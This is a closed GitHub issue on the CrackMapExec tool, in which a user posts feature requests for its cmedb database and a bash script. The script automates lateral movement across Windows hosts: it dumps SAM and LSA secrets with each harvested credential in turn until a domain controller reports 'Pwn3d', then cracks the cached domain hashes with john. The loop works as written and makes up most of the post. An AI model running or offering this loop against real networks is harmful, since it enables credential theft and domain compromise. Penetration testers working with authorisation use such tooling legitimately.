Closed s0i37 closed 3 years ago
Ok. Currently I can implement lateral movement automation like this:
sort targets.txt
cme smb -d . -u admin -p password --shares 10.0.0.10 #initial creds
id=1
while :
do
cme smb -id $id --sam <(comm -23 targets.txt <(sqlite3 ~/.cme/workspaces/default/smb.db "select c.ip from computers as c, users as u, admin_relations as r where r.userid=u.id and r.computerid=c.id"|sort))
cme smb -id $id --lsa <(comm -23 targets.txt <(sqlite3 ~/.cme/workspaces/default/smb.db "select c.ip from computers as c, users as u, admin_relations as r where r.userid=u.id and r.computerid=c.id"|sort))
sqlite3 ~/.cme/workspaces/default/smb.db "delete from users where username='Guest'"
sqlite3 ~/.cme/workspaces/default/smb.db "delete from users where username='DefaultAccount'"
cme smb -id $id --shares dc.txt 2>&1 | grep Pwn3d && break
((id++))
done
grep -r @ ~/.cme/logs; fgrep -ar '\' ~/.cme/logs | fgrep -v '$:'
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached)
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached) --show
It seems that cme
doesn't appropriate handle pipe input.
Fix crackmapexec.py:
target_file_type = '' #identify_target_file(target)
Hello. I want to suggest you a bit improve current cmedb opportunities. Currently
hosts
can search only forIP
andHostname
. May be it need to search also for other available columns?And the same for
creds
:Also it would be very nice if we can use
cmedb
andcme
together for automatic covering all credentials for all available hosts. I expected something like this:Hence
cmedb
should also read commands via arguments like acmedb "workspace company_x;hosts 10.0.0; hosts 11.0.0"
. I suppose all of these things could be implement very easy)